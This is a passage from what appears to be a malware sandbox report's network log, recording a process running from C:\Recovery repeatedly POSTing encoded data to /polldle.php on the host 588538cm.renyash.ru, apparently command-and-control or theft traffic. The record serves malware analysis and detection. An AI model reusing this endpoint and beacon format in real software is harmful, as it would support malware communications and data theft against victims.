                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:32:56.665577888 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RG2%2F6IxRip45c0R%2BIrEp68ueTrqb5tlN7EFOg2xnytUSThfoPImaJJWmfHR6CNE6CsRi9bawcFQvhL%2BuMh8vppmXwLNyCUyTMjk1GEGSm%2BaqJsLcBS2UzQrnpM65Q4drqPjfTXIE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d919a2641af-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3201&min_rtt=1936&rtt_var=3256&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=121081&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:32:56.665982008 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RG2%2F6IxRip45c0R%2BIrEp68ueTrqb5tlN7EFOg2xnytUSThfoPImaJJWmfHR6CNE6CsRi9bawcFQvhL%2BuMh8vppmXwLNyCUyTMjk1GEGSm%2BaqJsLcBS2UzQrnpM65Q4drqPjfTXIE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d919a2641af-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3201&min_rtt=1936&rtt_var=3256&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=121081&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0
                                                                                Jan 11, 2025 23:32:56.666282892 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RG2%2F6IxRip45c0R%2BIrEp68ueTrqb5tlN7EFOg2xnytUSThfoPImaJJWmfHR6CNE6CsRi9bawcFQvhL%2BuMh8vppmXwLNyCUyTMjk1GEGSm%2BaqJsLcBS2UzQrnpM65Q4drqPjfTXIE"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085d919a2641af-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3201&min_rtt=1936&rtt_var=3256&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=121081&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                5 | 192.168.2.4 | 49745 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:32:57.746032000 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1616
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:32:58.098711967 CET | 1616 | OUT | Data Raw: 5d 5d 51 53 5a 49 5f 5f 54 5d 55 5a 50 5d 59 50 50 5c 5a 5f 57 56 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]QSZI__T]UZP]YPP\Z_WVP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:3$(/23?"?!;87Y+12V-8[!2((%#X'/\/
                                                                                Jan 11, 2025 23:32:58.190722942 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:32:58.440850973 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:32:58 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kRdrsJU51lf3pwpoeaqe5QCmQjQGQhMaICmOhcQr89C6Xhuv3UpUvp6JJEvxeYJiLTVYQOtapzIQt%2BIOHznOQW%2BNy5whLUkVmztfYxNgJDpwXurzaDHzOt5NXYR0zmhURhbP7tF3"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085da36e308c3c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1880&rtt_var=718&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1935&delivery_rate=776595&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 1f 24 0a 05 04 29 3a 23 59 39 3b 3c 05 2c 22 3f 03 3e 21 26 17 34 07 12 1e 31 1c 0e 50 3f 39 21 08 2b 5c 2b 1c 23 10 0b 0a 26 39 23 46 0c 1d 22 10 3d 06 20 1b 31 5a 2b 04 2b 23 2e 10 25 54 2c 44 2a 42 3f 54 29 3a 3a 04 22 02 3e 53 28 21 29 57 28 35 2d 07 2c 21 2b 58 32 10 2e 51 0f 16 21 51 21 0f 28 5e 23 13 33 5c 24 30 38 01 29 24 3c 13 25 03 28 57 3c 0a 22 58 2b 1c 05 08 30 13 24 09 31 3c 36 5e 3c 2a 28 0a 28 11 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.$):#Y9;<,"?>!&41P?9!+\+#&9#F"= 1Z++#.%T,D*B?T)::">S(!)W(5-,!+X2.Q!Q!(^#3\$08)$<%(W<"X+0$1<6^<*(($\#(V?[M0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                6 | 192.168.2.4 | 49752 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:32:59.444406986 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:32:59.801676035 CET | 2504 | OUT | Data Raw: 58 5a 54 50 5f 46 5a 58 54 5d 55 5a 50 54 59 5b 50 52 5a 53 57 57 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZTP_FZXT]UZPTY[PRZSWWPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#9:$8&5$/%V#<_-;4(3T&U6W94 "X?5#X'/\/
                                                                                Jan 11, 2025 23:32:59.909514904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:00.153682947 CET | 795 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:00 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=22QctwjEaLfN5kdvAzjKQKHHbFEYNfNtafK%2BclDk2IXSowswA8slHIaRaj0eE4jZMUUszquvAzH0D9dFC3QmsDFNuNNMHHgVG0WrAfgFBdEvJSl41LTekWcXYJHwSzhDTTkGyknU"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dae2eb91a17-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4055&min_rtt=1998&rtt_var=4864&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=79089&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:00.244112015 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                7 | 192.168.2.4 | 49754 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:00.722103119 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:01.067326069 CET | 2504 | OUT | Data Raw: 58 51 54 50 5a 47 5f 58 54 5d 55 5a 50 58 59 59 50 51 5a 58 57 5c 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTPZG_XT]UZPXYYPQZXW\PW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B.)%0$!5$/"7)X/++,+% 1-4(Z"2$+#X'/\/4
                                                                                Jan 11, 2025 23:33:01.185548067 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:01.442842960 CET | 790 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSUCOu1oWCWqikEe62Ks2gfoz1Hy6CkrQ7kcKbo3fVK%2FkQhsf7f5bqVa0t7VwEA8XI1msFEhaEbgXz23f5oNlfW3IMeiXNx82PfQrxeYn2eYUx%2B6SkWYCzLeHXYnjJFX%2BnXxPthB"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085db61b2143c3-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4429&min_rtt=1711&rtt_var=6079&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=62230&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Jan 11, 2025 23:33:01.545175076 CET | 14 | IN | Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                8 | 192.168.2.4 | 49760 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:01.919935942 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:02.272572041 CET | 2504 | OUT | Data Raw: 5d 5a 54 56 5a 40 5a 5a 54 5d 55 5a 50 5f 59 59 50 55 5a 59 57 57 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZTVZ@ZZT]UZP_YYPUZYWWP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#9#!2 \2!^3.#!,](<</T%9,4(""#+5#X'/\/(
                                                                                Jan 11, 2025 23:33:02.392760038 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:02.641227961 CET | 797 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QV951Y2VX0bOC7G8b7Mf%2FSkaQNcDSWPmEdKkYSlpuA6kIjOEEz9yx5FMFQmhyx4zORabJ7MMJD%2BCG4o1kluiiTonzgQ5KROsgJrwCLvT0ogl0lOGiMQvp2lnLHCzZotIO0ugxobq"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dbdaf322394-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6313&min_rtt=1976&rtt_var=9415&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=39809&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:02.733350039 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                9 | 192.168.2.4 | 49763 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:03.010304928 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:03.364293098 CET | 2500 | OUT | Data Raw: 5d 5a 51 57 5a 47 5a 5c 54 5d 55 5a 50 5c 59 5c 50 50 5a 5b 57 5c 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZQWZGZ\T]UZP\Y\PPZ[W\PZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:C%8;&22'24%Y;]<($%*U94;#"/Y<#X'/\/4
                                                                                Jan 11, 2025 23:33:03.455404043 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                10 | 192.168.2.4 | 49767 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:03.558163881 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1616
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:03.903790951 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:03.904010057 CET | 1616 | OUT | Data Raw: 58 50 51 57 5f 45 5f 58 54 5d 55 5a 50 5f 59 50 50 50 5a 52 57 54 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPQW_E_XT]UZP_YPPPZRWTPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-6E$8$"%]0/&"?&;;8?3V1&.B?#1/Y*%#X'/\/(
                                                                                Jan 11, 2025 23:33:04.230988026 CET | 962 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9FPQqHLok5WZRU%2BQMVEozY7Asw%2FL2imTXeZFU1rkDIqlKYD8ZBxoo%2BCU0%2F%2FnO5wwLjg01iMvCeAgTn0UNnhjanTbwlpc0cKbxhnN2R44HkDyLenBTMhkDy3LmHmFqZHU%2FW%2BZgsD"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dc71f39c46d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7924&min_rtt=1526&rtt_var=13369&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1935&delivery_rate=27697&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Jan 11, 2025 23:33:04.518764973 CET | 962 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9FPQqHLok5WZRU%2BQMVEozY7Asw%2FL2imTXeZFU1rkDIqlKYD8ZBxoo%2BCU0%2F%2FnO5wwLjg01iMvCeAgTn0UNnhjanTbwlpc0cKbxhnN2R44HkDyLenBTMhkDy3LmHmFqZHU%2FW%2BZgsD"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dc71f39c46d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7924&min_rtt=1526&rtt_var=13369&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1935&delivery_rate=27697&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                11 | 192.168.2.4 | 49768 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:03.849806070 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:04.207915068 CET | 2504 | OUT | Data Raw
                                                                                Jan 11, 2025 23:33:04.301589012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:04.518809080 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:04.562329054 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FvK7REMcHdYjoIwIKN5eibErPZJe74f72ak%2FH27wm6%2BhscAhon%2FL%2Bu2WZ7aiXJLbxE9Qs8vEUArFs%2FEWoqhlrJlO%2FeNGQSHVcSTjLxddbEUHUWgy4IjdHYDtgpmfiM6NPO8jfFlb"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dc9a9dc0ca4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2979&min_rtt=1628&rtt_var=3313&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=117353&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                12 | 192.168.2.4 | 49783 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:06.538461924 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:06.895519018 CET | 2504 | OUT | Data Raw
                                                                                Jan 11, 2025 23:33:07.001715899 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:07.237212896 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2B8jE59zALaVQkk8sOeOfjTlfUMZ%2FwkI9tKmqxPikD03NoRYL9dBcpUMFZoVxANwuIWYLH9UcX%2Bd0dUP7xihTQlg5dwJlDRRDiwuiQuMoM2%2BXTno%2BVMizmJ6FXQzaH5TEvzwcCSq"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dda7bc71a07-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7976&min_rtt=1865&rtt_var=12922&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=28763&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                13 | 192.168.2.4 | 49790 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:07.385251045 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:07.739288092 CET | 2500 | OUT | Data Raw
                                                                                Jan 11, 2025 23:33:07.827342033 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:08.056376934 CET | 798 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:08 GMT
